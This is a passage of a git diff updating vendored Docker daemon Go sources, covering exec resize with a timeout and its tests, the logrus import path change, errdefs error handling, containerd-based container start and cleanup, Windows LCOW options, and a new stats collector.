+ timeout := 10 * time.Second + select { + case <-ec.Started: + return daemon.containerd.ResizeTerminal(context.Background(), ec.ContainerID, ec.ID, width, height) + case <-time.After(timeout): + return fmt.Errorf("timeout waiting for exec session ready") + } } diff --git a/vendor/github.com/docker/docker/daemon/resize_test.go b/vendor/github.com/docker/docker/daemon/resize_test.go new file mode 100644 index 0000000000..edfe9d3ed1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/resize_test.go @@ -0,0 +1,103 @@ +// +build linux + +package daemon + +import ( + "context" + "testing" + + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "gotest.tools/assert" +) + +// This test simply verify that when a wrong ID used, a specific error should be returned for exec resize. +func TestExecResizeNoSuchExec(t *testing.T) { + n := "TestExecResize" + d := &Daemon{ + execCommands: exec.NewStore(), + } + c := &container.Container{ + ExecCommands: exec.NewStore(), + } + ec := &exec.Config{ + ID: n, + } + d.registerExecCommand(c, ec) + err := d.ContainerExecResize("nil", 24, 8) + assert.ErrorContains(t, err, "No such exec instance") +} + +type execResizeMockContainerdClient struct { + MockContainerdClient + ProcessID string + ContainerID string + Width int + Height int +} + +func (c *execResizeMockContainerdClient) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error { + c.ProcessID = processID + c.ContainerID = containerID + c.Width = width + c.Height = height + return nil +} + +// This test is to make sure that when exec context is ready, resize should call ResizeTerminal via containerd client. 
+func TestExecResize(t *testing.T) { + n := "TestExecResize" + width := 24 + height := 8 + ec := &exec.Config{ + ID: n, + ContainerID: n, + Started: make(chan struct{}), + } + close(ec.Started) + mc := &execResizeMockContainerdClient{} + d := &Daemon{ + execCommands: exec.NewStore(), + containerd: mc, + containers: container.NewMemoryStore(), + } + c := &container.Container{ + ExecCommands: exec.NewStore(), + State: &container.State{Running: true}, + } + d.containers.Add(n, c) + d.registerExecCommand(c, ec) + err := d.ContainerExecResize(n, height, width) + assert.NilError(t, err) + assert.Equal(t, mc.Width, width) + assert.Equal(t, mc.Height, height) + assert.Equal(t, mc.ProcessID, n) + assert.Equal(t, mc.ContainerID, n) +} + +// This test is to make sure that when exec context is not ready, a timeout error should happen. +// TODO: the expect running time for this test is 10s, which would be too long for unit test. +func TestExecResizeTimeout(t *testing.T) { + n := "TestExecResize" + width := 24 + height := 8 + ec := &exec.Config{ + ID: n, + ContainerID: n, + Started: make(chan struct{}), + } + mc := &execResizeMockContainerdClient{} + d := &Daemon{ + execCommands: exec.NewStore(), + containerd: mc, + containers: container.NewMemoryStore(), + } + c := &container.Container{ + ExecCommands: exec.NewStore(), + State: &container.State{Running: true}, + } + d.containers.Add(n, c) + d.registerExecCommand(c, ec) + err := d.ContainerExecResize(n, height, width) + assert.ErrorContains(t, err, "timeout waiting for exec session ready") +} diff --git a/vendor/github.com/docker/docker/daemon/restart.go b/vendor/github.com/docker/docker/daemon/restart.go index 79292f3752..0f06dea267 100644 --- a/vendor/github.com/docker/docker/daemon/restart.go +++ b/vendor/github.com/docker/docker/daemon/restart.go @@ -1,10 +1,10 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" - "github.com/Sirupsen/logrus" "github.com/docker/docker/container" + 
"github.com/sirupsen/logrus" ) // ContainerRestart stops and starts a container. It attempts to @@ -52,7 +52,7 @@ func (daemon *Daemon) containerRestart(container *container.Container, seconds i container.HostConfig.AutoRemove = autoRemove // containerStop will write HostConfig to disk, we shall restore AutoRemove // in disk too - if toDiskErr := container.ToDiskLocking(); toDiskErr != nil { + if toDiskErr := daemon.checkpointAndSave(container); toDiskErr != nil { logrus.Errorf("Write container to disk error: %v", toDiskErr) } diff --git a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go index ff1127b6c2..3855c7830e 100644 --- a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go +++ b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go @@ -1,6 +1,6 @@ // +build linux,!seccomp -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" diff --git a/vendor/github.com/docker/docker/daemon/seccomp_linux.go b/vendor/github.com/docker/docker/daemon/seccomp_linux.go index 7f16733d95..66ab8c768c 100644 --- a/vendor/github.com/docker/docker/daemon/seccomp_linux.go +++ b/vendor/github.com/docker/docker/daemon/seccomp_linux.go @@ -1,20 +1,20 @@ // +build linux,seccomp -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" - "github.com/Sirupsen/logrus" "github.com/docker/docker/container" "github.com/docker/docker/profiles/seccomp" "github.com/opencontainers/runtime-spec/specs-go" + "github.com/sirupsen/logrus" ) var supportsSeccomp = true func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error { - var profile *specs.Seccomp + var profile *specs.LinuxSeccomp var err error if c.HostConfig.Privileged { diff --git a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go index b3691e96af..a323fe0be1 100644 --- 
a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go @@ -1,5 +1,5 @@ // +build !linux -package daemon +package daemon // import "github.com/docker/docker/daemon" var supportsSeccomp = false diff --git a/vendor/github.com/docker/docker/daemon/secrets.go b/vendor/github.com/docker/docker/daemon/secrets.go index 355cb1e139..6d368a9fd7 100644 --- a/vendor/github.com/docker/docker/daemon/secrets.go +++ b/vendor/github.com/docker/docker/daemon/secrets.go @@ -1,23 +1,10 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "github.com/Sirupsen/logrus" swarmtypes "github.com/docker/docker/api/types/swarm" - "github.com/docker/swarmkit/agent/exec" + "github.com/sirupsen/logrus" ) -// SetContainerSecretStore sets the secret store backend for the container -func (daemon *Daemon) SetContainerSecretStore(name string, store exec.SecretGetter) error { - c, err := daemon.GetContainer(name) - if err != nil { - return err - } - - c.SecretStore = store - - return nil -} - // SetContainerSecretReferences sets the container secret references needed func (daemon *Daemon) SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error { if !secretsSupported() && len(refs) > 0 { diff --git a/vendor/github.com/docker/docker/daemon/secrets_linux.go b/vendor/github.com/docker/docker/daemon/secrets_linux.go index fca4e12598..2be70be31c 100644 --- a/vendor/github.com/docker/docker/daemon/secrets_linux.go +++ b/vendor/github.com/docker/docker/daemon/secrets_linux.go @@ -1,6 +1,4 @@ -// +build linux - -package daemon +package daemon // import "github.com/docker/docker/daemon" func secretsSupported() bool { return true diff --git a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go index d6f36fda1e..edad69c569 100644 --- a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go +++ 
b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux +// +build !linux,!windows -package daemon +package daemon // import "github.com/docker/docker/daemon" func secretsSupported() bool { return false diff --git a/vendor/github.com/docker/docker/daemon/secrets_windows.go b/vendor/github.com/docker/docker/daemon/secrets_windows.go new file mode 100644 index 0000000000..2be70be31c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/secrets_windows.go @@ -0,0 +1,5 @@ +package daemon // import "github.com/docker/docker/daemon" + +func secretsSupported() bool { + return true +} diff --git a/vendor/github.com/docker/docker/daemon/selinux_linux.go b/vendor/github.com/docker/docker/daemon/selinux_linux.go index 83a3447111..f87b30b738 100644 --- a/vendor/github.com/docker/docker/daemon/selinux_linux.go +++ b/vendor/github.com/docker/docker/daemon/selinux_linux.go @@ -1,17 +1,15 @@ -// +build linux +package daemon // import "github.com/docker/docker/daemon" -package daemon - -import "github.com/opencontainers/runc/libcontainer/selinux" +import "github.com/opencontainers/selinux/go-selinux" func selinuxSetDisabled() { selinux.SetDisabled() } func selinuxFreeLxcContexts(label string) { - selinux.FreeLxcContexts(label) + selinux.ReleaseLabel(label) } func selinuxEnabled() bool { - return selinux.SelinuxEnabled() + return selinux.GetEnabled() } diff --git a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go index 25a56ad157..49d0d13bce 100644 --- a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package daemon +package daemon // import "github.com/docker/docker/daemon" func selinuxSetDisabled() { } diff --git a/vendor/github.com/docker/docker/daemon/start.go b/vendor/github.com/docker/docker/daemon/start.go index 6c94fd5482..c00bd9ceb2 
100644 --- a/vendor/github.com/docker/docker/daemon/start.go +++ b/vendor/github.com/docker/docker/daemon/start.go @@ -1,27 +1,23 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "net/http" + "context" "runtime" - "strings" - "syscall" "time" - "google.golang.org/grpc" - - "github.com/Sirupsen/logrus" - apierrors "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/runconfig" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/mount" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ContainerStart starts a container. func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.HostConfig, checkpoint string, checkpointDir string) error { if checkpoint != "" && !daemon.HasExperimental() { - return apierrors.NewBadRequestError(fmt.Errorf("checkpoint is only supported in experimental mode")) + return errdefs.InvalidParameter(errors.New("checkpoint is only supported in experimental mode")) } container, err := daemon.GetContainer(name) @@ -29,13 +25,26 @@ func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.Hos return err } - if container.IsPaused() { - return fmt.Errorf("Cannot start a paused container, try unpause instead.") + validateState := func() error { + container.Lock() + defer container.Unlock() + + if container.Paused { + return errdefs.Conflict(errors.New("cannot start a paused container, try unpause instead")) + } + + if container.Running { + return containerNotModifiedError{running: true} + } + + if container.RemovalInProgress || container.Dead { + return errdefs.Conflict(errors.New("container is marked for removal and cannot be started")) + } + return nil } - if container.IsRunning() { - err := fmt.Errorf("Container already started") - return apierrors.NewErrorWithStatusCode(err, 
http.StatusNotModified) + if err := validateState(); err != nil { + return err } // Windows does not have the backwards compatibility issue here. @@ -46,52 +55,46 @@ func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.Hos logrus.Warn("DEPRECATED: Setting host configuration options when the container starts is deprecated and has been removed in Docker 1.12") oldNetworkMode := container.HostConfig.NetworkMode if err := daemon.setSecurityOptions(container, hostConfig); err != nil { - return err + return errdefs.InvalidParameter(err) } if err := daemon.mergeAndVerifyLogConfig(&hostConfig.LogConfig); err != nil { - return err + return errdefs.InvalidParameter(err) } if err := daemon.setHostConfig(container, hostConfig); err != nil { - return err + return errdefs.InvalidParameter(err) } newNetworkMode := container.HostConfig.NetworkMode if string(oldNetworkMode) != string(newNetworkMode) { // if user has change the network mode on starting, clean up the // old networks. It is a deprecated feature and has been removed in Docker 1.12 container.NetworkSettings.Networks = nil - if err := container.ToDisk(); err != nil { - return err + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + return errdefs.System(err) } } container.InitDNSHostConfig() } } else { if hostConfig != nil { - return fmt.Errorf("Supplying a hostconfig on start is not supported. It should be supplied on create") + return errdefs.InvalidParameter(errors.New("Supplying a hostconfig on start is not supported. It should be supplied on create")) } } // check if hostConfig is in line with the current system settings. // It may happen cgroups are umounted or the like. 
- if _, err = daemon.verifyContainerSettings(container.HostConfig, nil, false); err != nil { - return err + if _, err = daemon.verifyContainerSettings(container.OS, container.HostConfig, nil, false); err != nil { + return errdefs.InvalidParameter(err) } // Adapt for old containers in case we have updates in this function and // old containers never have chance to call the new function in create stage. if hostConfig != nil { if err := daemon.adaptContainerSettings(container.HostConfig, false); err != nil { - return err + return errdefs.InvalidParameter(err) } } - return daemon.containerStart(container, checkpoint, checkpointDir, true) } -// Start starts a container -func (daemon *Daemon) Start(container *container.Container) error { - return daemon.containerStart(container, "", "", true) -} - // containerStart prepares the container to run by setting up everything the // container needs, such as storage and networking, as well as links // between containers. The container is left waiting for a signal to @@ -106,7 +109,12 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint } if container.RemovalInProgress || container.Dead { - return fmt.Errorf("Container is marked for removal and cannot be started.") + return errdefs.Conflict(errors.New("container is marked for removal and cannot be started")) + } + + if checkpointDir != "" { + // TODO(mlaventure): how would we support that? 
+ return errdefs.Forbidden(errors.New("custom checkpointdir is not supported")) } // if we encounter an error during start we need to ensure that any other @@ -118,8 +126,9 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint if container.ExitCode() == 0 { container.SetExitCode(128) } - container.ToDisk() - + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + logrus.Errorf("%s: failed saving state on start failure: %v", container.ID, err) + } container.Reset(false) daemon.Cleanup(container) @@ -138,61 +147,65 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint return err } - // Make sure NetworkMode has an acceptable value. We do this to ensure - // backwards API compatibility. - container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig) - if err := daemon.initializeNetworking(container); err != nil { return err } spec, err := daemon.createSpec(container) if err != nil { + return errdefs.System(err) + } + + if resetRestartManager { + container.ResetRestartManager(true) + } + + if daemon.saveApparmorConfig(container); err != nil { return err } + if checkpoint != "" { + checkpointDir, err = getCheckpointDir(checkpointDir, checkpoint, container.Name, container.ID, container.CheckpointDir(), false) + if err != nil { + return err + } + } + createOptions, err := daemon.getLibcontainerdCreateOptions(container) if err != nil { return err } - if resetRestartManager { - container.ResetRestartManager(true) + err = daemon.containerd.Create(context.Background(), container.ID, spec, createOptions) + if err != nil { + return translateContainerdStartErr(container.Path, container.SetExitCode, err) } - if checkpointDir == "" { - checkpointDir = container.CheckpointDir() + // TODO(mlaventure): we need to specify checkpoint options here + pid, err := daemon.containerd.Start(context.Background(), container.ID, checkpointDir, + container.StreamConfig.Stdin() != nil || 
container.Config.Tty, + container.InitializeStdio) + if err != nil { + if err := daemon.containerd.Delete(context.Background(), container.ID); err != nil { + logrus.WithError(err).WithField("container", container.ID). + Error("failed to delete failed start container") + } + return translateContainerdStartErr(container.Path, container.SetExitCode, err) } - if err := daemon.containerd.Create(container.ID, checkpoint, checkpointDir, *spec, container.InitializeStdio, createOptions...); err != nil { - errDesc := grpc.ErrorDesc(err) - contains := func(s1, s2 string) bool { - return strings.Contains(strings.ToLower(s1), s2) - } - logrus.Errorf("Create container failed with error: %s", errDesc) - // if we receive an internal error from the initial start of a container then lets - // return it instead of entering the restart loop - // set to 127 for container cmd not found/does not exist) - if contains(errDesc, container.Path) && - (contains(errDesc, "executable file not found") || - contains(errDesc, "no such file or directory") || - contains(errDesc, "system cannot find the file specified")) { - container.SetExitCode(127) - } - // set to 126 for container cmd can't be invoked errors - if contains(errDesc, syscall.EACCES.Error()) { - container.SetExitCode(126) - } + container.SetRunning(pid, true) + container.HasBeenManuallyStopped = false + container.HasBeenStartedBefore = true + daemon.setStateCounter(container) - // attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts - if contains(errDesc, syscall.ENOTDIR.Error()) { - errDesc += ": Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type" - container.SetExitCode(127) - } + daemon.initHealthMonitor(container) - return fmt.Errorf("%s", errDesc) + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + logrus.WithError(err).WithField("container", container.ID). 
+ Errorf("failed to store container") } + daemon.LogContainerEvent(container, "start") containerActions.WithValues("start").UpdateSince(start) return nil @@ -203,12 +216,14 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint func (daemon *Daemon) Cleanup(container *container.Container) { daemon.releaseNetwork(container) - container.UnmountIpcMounts(detachMounted) + if err := container.UnmountIpcMount(detachMounted); err != nil { + logrus.Warnf("%s cleanup: failed to unmount IPC: %s", container.ID, err) + } if err := daemon.conditionalUnmountOnCleanup(container); err != nil { // FIXME: remove once reference counting for graphdrivers has been refactored // Ensure that all the mounts are gone - if mountid, err := daemon.layerStore.GetMountID(container.ID); err == nil { + if mountid, err := daemon.imageService.GetLayerMountID(container.ID, container.OS); err == nil { daemon.cleanupMountsByID(mountid) } } @@ -217,14 +232,23 @@ func (daemon *Daemon) Cleanup(container *container.Container) { logrus.Warnf("%s cleanup: failed to unmount secrets: %s", container.ID, err) } + if err := mount.RecursiveUnmount(container.Root); err != nil { + logrus.WithError(err).WithField("container", container.ID).Warn("Error while cleaning up container resource mounts.") + } + for _, eConfig := range container.ExecCommands.Commands() { daemon.unregisterExecCommand(container, eConfig) } - if container.BaseFS != "" { + if container.BaseFS != nil && container.BaseFS.Path() != "" { if err := container.UnmountVolumes(daemon.LogVolumeEvent); err != nil { logrus.Warnf("%s cleanup: Failed to umount volumes: %v", container.ID, err) } } + container.CancelAttachContext() + + if err := daemon.containerd.Delete(context.Background(), container.ID); err != nil { + logrus.Errorf("%s cleanup: failed to delete container from containerd: %v", container.ID, err) + } } diff --git a/vendor/github.com/docker/docker/daemon/start_unix.go 
b/vendor/github.com/docker/docker/daemon/start_unix.go index 6bbe485075..e680b95f42 100644 --- a/vendor/github.com/docker/docker/daemon/start_unix.go +++ b/vendor/github.com/docker/docker/daemon/start_unix.go @@ -1,31 +1,57 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" + "os/exec" + "path/filepath" + "github.com/containerd/containerd/runtime/linux/runctypes" "github.com/docker/docker/container" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" ) -func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) { - createOptions := []libcontainerd.CreateOption{} +func (daemon *Daemon) getRuntimeScript(container *container.Container) (string, error) { + name := container.HostConfig.Runtime + rt := daemon.configStore.GetRuntime(name) + if rt == nil { + return "", errdefs.InvalidParameter(errors.Errorf("no such runtime '%s'", name)) + } + + if len(rt.Args) > 0 { + // First check that the target exist, as using it in a script won't + // give us the right error + if _, err := exec.LookPath(rt.Path); err != nil { + return "", translateContainerdStartErr(container.Path, container.SetExitCode, err) + } + return filepath.Join(daemon.configStore.Root, "runtimes", name), nil + } + return rt.Path, nil +} +// getLibcontainerdCreateOptions callers must hold a lock on the container +func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) (interface{}, error) { // Ensure a runtime has been assigned to this container if container.HostConfig.Runtime == "" { - container.HostConfig.Runtime = stockRuntimeName - container.ToDisk() + container.HostConfig.Runtime = daemon.configStore.GetDefaultRuntimeName() + container.CheckpointTo(daemon.containersReplica) } - rt := daemon.configStore.GetRuntime(container.HostConfig.Runtime) - if rt == nil { - return nil, fmt.Errorf("no such runtime 
'%s'", container.HostConfig.Runtime) + path, err := daemon.getRuntimeScript(container) + if err != nil { + return nil, err } + opts := &runctypes.RuncOptions{ + Runtime: path, + RuntimeRoot: filepath.Join(daemon.configStore.ExecRoot, + fmt.Sprintf("runtime-%s", container.HostConfig.Runtime)), + } + if UsingSystemd(daemon.configStore) { - rt.Args = append(rt.Args, "--systemd-cgroup=true") + opts.SystemdCgroup = true } - createOptions = append(createOptions, libcontainerd.WithRuntime(rt.Path, rt.Args)) - return createOptions, nil + return opts, nil } diff --git a/vendor/github.com/docker/docker/daemon/start_windows.go b/vendor/github.com/docker/docker/daemon/start_windows.go index faa7575224..f4606f7a60 100644 --- a/vendor/github.com/docker/docker/daemon/start_windows.go +++ b/vendor/github.com/docker/docker/daemon/start_windows.go @@ -1,205 +1,38 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "io/ioutil" - "path/filepath" - "strings" - + "github.com/Microsoft/opengcs/client" "github.com/docker/docker/container" - "github.com/docker/docker/layer" - "github.com/docker/docker/libcontainerd" - "golang.org/x/sys/windows/registry" -) - -const ( - credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs` - credentialSpecFileLocation = "CredentialSpecs" ) -func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) { - createOptions := []libcontainerd.CreateOption{} - - // Are we going to run as a Hyper-V container? - hvOpts := &libcontainerd.HyperVIsolationOption{} - if container.HostConfig.Isolation.IsDefault() { - // Container is set to use the default, so take the default from the daemon configuration - hvOpts.IsHyperV = daemon.defaultIsolation.IsHyperV() - } else { - // Container is requesting an isolation mode. Honour it. 
- hvOpts.IsHyperV = container.HostConfig.Isolation.IsHyperV() - } - - // Generate the layer folder of the layer options - layerOpts := &libcontainerd.LayerOption{} - m, err := container.RWLayer.Metadata() - if err != nil { - return nil, fmt.Errorf("failed to get layer metadata - %s", err) - } - if hvOpts.IsHyperV { - hvOpts.SandboxPath = filepath.Dir(m["dir"]) - } - - layerOpts.LayerFolderPath = m["dir"] - - // Generate the layer paths of the layer options - img, err := daemon.imageStore.Get(container.ImageID) - if err != nil { - return nil, fmt.Errorf("failed to graph.Get on ImageID %s - %s", container.ImageID, err) - } - // Get the layer path for each layer. - max := len(img.RootFS.DiffIDs) - for i := 1; i <= max; i++ { - img.RootFS.DiffIDs = img.RootFS.DiffIDs[:i] - layerPath, err := layer.GetLayerPath(daemon.layerStore, img.RootFS.ChainID()) - if err != nil { - return nil, fmt.Errorf("failed to get layer path from graphdriver %s for ImageID %s - %s", daemon.layerStore, img.RootFS.ChainID(), err) +func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) (interface{}, error) { + // LCOW options. + if container.OS == "linux" { + config := &client.Config{} + if err := config.GenerateDefault(daemon.configStore.GraphOptions); err != nil { + return nil, err } - // Reverse order, expecting parent most first - layerOpts.LayerPaths = append([]string{layerPath}, layerOpts.LayerPaths...) 
- } - - // Get endpoints for the libnetwork allocated networks to the container - var epList []string - AllowUnqualifiedDNSQuery := false - gwHNSID := "" - if container.NetworkSettings != nil { - for n := range container.NetworkSettings.Networks { - sn, err := daemon.FindNetwork(n) - if err != nil { - continue - } - - ep, err := container.GetEndpointInNetwork(sn) - if err != nil { - continue - } - - data, err := ep.DriverInfo() - if err != nil { - continue - } - - if data["GW_INFO"] != nil { - gwInfo := data["GW_INFO"].(map[string]interface{}) - if gwInfo["hnsid"] != nil { - gwHNSID = gwInfo["hnsid"].(string) - } - } - - if data["hnsid"] != nil { - epList = append(epList, data["hnsid"].(string)) - } - - if data["AllowUnqualifiedDNSQuery"] != nil { - AllowUnqualifiedDNSQuery = true + // Override from user-supplied options. + for k, v := range container.HostConfig.StorageOpt { + switch k { + case "lcow.kirdpath": + config.KirdPath = v + case "lcow.kernel": + config.KernelFile = v + case "lcow.initrd": + config.InitrdFile = v + case "lcow.vhdx": + config.Vhdx = v + case "lcow.bootparameters": + config.BootParameters = v } } - } - - if gwHNSID != "" { - epList = append(epList, gwHNSID) - } - - // Read and add credentials from the security options if a credential spec has been provided. 
- if container.HostConfig.SecurityOpt != nil { - for _, sOpt := range container.HostConfig.SecurityOpt { - sOpt = strings.ToLower(sOpt) - if !strings.Contains(sOpt, "=") { - return nil, fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt) - } - var splitsOpt []string - splitsOpt = strings.SplitN(sOpt, "=", 2) - if len(splitsOpt) != 2 { - return nil, fmt.Errorf("invalid security option: %s", sOpt) - } - if splitsOpt[0] != "credentialspec" { - return nil, fmt.Errorf("security option not supported: %s", splitsOpt[0]) - } - - credentialsOpts := &libcontainerd.CredentialsOption{} - var ( - match bool - csValue string - err error - ) - if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match { - if csValue == "" { - return nil, fmt.Errorf("no value supplied for file:// credential spec security option") - } - if credentialsOpts.Credentials, err = readCredentialSpecFile(container.ID, daemon.root, filepath.Clean(csValue)); err != nil { - return nil, err - } - } else if match, csValue = getCredentialSpec("registry://", splitsOpt[1]); match { - if csValue == "" { - return nil, fmt.Errorf("no value supplied for registry:// credential spec security option") - } - if credentialsOpts.Credentials, err = readCredentialSpecRegistry(container.ID, csValue); err != nil { - return nil, err - } - } else { - return nil, fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value") - } - createOptions = append(createOptions, credentialsOpts) + if err := config.Validate(); err != nil { + return nil, err } - } - // Now add the remaining options. 
- createOptions = append(createOptions, &libcontainerd.FlushOption{IgnoreFlushesDuringBoot: !container.HasBeenStartedBefore}) - createOptions = append(createOptions, hvOpts) - createOptions = append(createOptions, layerOpts) - if epList != nil { - createOptions = append(createOptions, &libcontainerd.NetworkEndpointsOption{Endpoints: epList, AllowUnqualifiedDNSQuery: AllowUnqualifiedDNSQuery}) + return config, nil } - return createOptions, nil -} - -// getCredentialSpec is a helper function to get the value of a credential spec supplied -// on the CLI, stripping the prefix -func getCredentialSpec(prefix, value string) (bool, string) { - if strings.HasPrefix(value, prefix) { - return true, strings.TrimPrefix(value, prefix) - } - return false, "" -} - -// readCredentialSpecRegistry is a helper function to read a credential spec from -// the registry. If not found, we return an empty string and warn in the log. -// This allows for staging on machines which do not have the necessary components. -func readCredentialSpecRegistry(id, name string) (string, error) { - var ( - k registry.Key - err error - val string - ) - if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil { - return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation) - } - if val, _, err = k.GetStringValue(name); err != nil { - if err == registry.ErrNotExist { - return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id) - } - return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id) - } - return val, nil -} - -// readCredentialSpecFile is a helper function to read a credential spec from -// a file. If not found, we return an empty string and warn in the log. -// This allows for staging on machines which do not have the necessary components. 
-func readCredentialSpecFile(id, root, location string) (string, error) { - if filepath.IsAbs(location) { - return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute") - } - base := filepath.Join(root, credentialSpecFileLocation) - full := filepath.Join(base, location) - if !strings.HasPrefix(full, base) { - return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base) - } - bcontents, err := ioutil.ReadFile(full) - if err != nil { - return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err) - } - return string(bcontents[:]), nil + return nil, nil } diff --git a/vendor/github.com/docker/docker/daemon/stats.go b/vendor/github.com/docker/docker/daemon/stats.go index 51f5962d17..eb23e272ae 100644 --- a/vendor/github.com/docker/docker/daemon/stats.go +++ b/vendor/github.com/docker/docker/daemon/stats.go @@ -1,14 +1,12 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "encoding/json" "errors" - "fmt" "runtime" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" "github.com/docker/docker/api/types/versions" @@ -20,9 +18,6 @@ import ( // ContainerStats writes information about the container to the stream // given in the config object. func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, config *backend.ContainerStatsConfig) error { - if runtime.GOOS == "solaris" { - return fmt.Errorf("%+v does not support stats", runtime.GOOS) - } // Engine API version (used for backwards compatibility) apiVersion := config.Version @@ -33,7 +28,9 @@ func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, c // If the container is either not running or restarting and requires no stream, return an empty stats. 
if (!container.IsRunning() || container.IsRestarting()) && !config.Stream { - return json.NewEncoder(config.OutStream).Encode(&types.Stats{}) + return json.NewEncoder(config.OutStream).Encode(&types.StatsJSON{ + Name: container.Name, + ID: container.ID}) } outStream := config.OutStream @@ -133,11 +130,11 @@ func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, c } func (daemon *Daemon) subscribeToContainerStats(c *container.Container) chan interface{} { - return daemon.statsCollector.collect(c) + return daemon.statsCollector.Collect(c) } func (daemon *Daemon) unsubscribeToContainerStats(c *container.Container, ch chan interface{}) { - daemon.statsCollector.unsubscribe(c, ch) + daemon.statsCollector.Unsubscribe(c, ch) } // GetContainerStats collects all the stats published by a container diff --git a/vendor/github.com/docker/docker/daemon/stats/collector.go b/vendor/github.com/docker/docker/daemon/stats/collector.go new file mode 100644 index 0000000000..88e20984bc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/stats/collector.go @@ -0,0 +1,159 @@ +package stats // import "github.com/docker/docker/daemon/stats" + +import ( + "bufio" + "sync" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/pubsub" + "github.com/sirupsen/logrus" +) + +// Collector manages and provides container resource stats +type Collector struct { + m sync.Mutex + supervisor supervisor + interval time.Duration + publishers map[*container.Container]*pubsub.Publisher + bufReader *bufio.Reader + + // The following fields are not set on Windows currently. 
+ clockTicksPerSecond uint64 +} + +// NewCollector creates a stats collector that will poll the supervisor with the specified interval +func NewCollector(supervisor supervisor, interval time.Duration) *Collector { + s := &Collector{ + interval: interval, + supervisor: supervisor, + publishers: make(map[*container.Container]*pubsub.Publisher), + bufReader: bufio.NewReaderSize(nil, 128), + } + + platformNewStatsCollector(s) + + return s +} + +type supervisor interface { + // GetContainerStats collects all the stats related to a container + GetContainerStats(container *container.Container) (*types.StatsJSON, error) +} + +// Collect registers the container with the collector and adds it to +// the event loop for collection on the specified interval returning +// a channel for the subscriber to receive on. +func (s *Collector) Collect(c *container.Container) chan interface{} { + s.m.Lock() + defer s.m.Unlock() + publisher, exists := s.publishers[c] + if !exists { + publisher = pubsub.NewPublisher(100*time.Millisecond, 1024) + s.publishers[c] = publisher + } + return publisher.Subscribe() +} + +// StopCollection closes the channels for all subscribers and removes +// the container from metrics collection. +func (s *Collector) StopCollection(c *container.Container) { + s.m.Lock() + if publisher, exists := s.publishers[c]; exists { 